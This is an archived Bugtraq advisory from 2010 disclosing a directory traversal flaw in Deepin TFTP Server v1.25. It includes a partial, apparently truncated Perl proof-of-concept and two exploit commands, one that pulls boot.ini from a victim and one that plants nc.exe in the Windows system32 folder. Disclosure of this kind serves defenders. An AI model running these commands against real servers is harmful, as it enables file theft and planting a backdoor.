Home page logo

bugtraq logo Bugtraq mailing list archives

Deepin TFTP Server Directory Traversal Vulnerability
From: "黄超毅" <huang_chaoyi () venustech com cn>
Date: Wed, 25 Aug 2010 22:19:49 +0800

Software : Deepin TFTP Server Directory Traversal Vulnerability
Software Version : v1.25
Vendor: Deepin.org 
Vulnerability Published : 2010-08-14
Vulnerability Update Time :
Status : 
Impact : Medium
Bug Description :
Deepin TFTP Server does not properly sanitise filenames containing directory traversal sequences that are received from 
an FTP client.
Proof Of Concept :
#!/usr/bin/perl -w
$target_ip=shift || die "usage: $0 \$target_ip\n";
open(TMP, ">tmp.txt");
print TMP "tmp";
foreach $dt_content (@directory_traversal){
        $dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
        print "command : tftp.exe $target_ip put tmp.txt $dt_content\n";
        print "$dt_it";
        if($dt_it=~m/^Transferred successfully/){
                print "Directory Traversal PAYLOAD is $dt_content.\n";
                print "Press [ENTER] Button to continue...\n";
print "Finish!\n";
Exploit :
#get sensitive file
c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini
#put malware
c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Dark2S Security Team/Venustech.GZ Branch

  By Date           By Thread  

Current thread:
  • Deepin TFTP Server Directory Traversal Vulnerability 黄超毅 (Aug 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]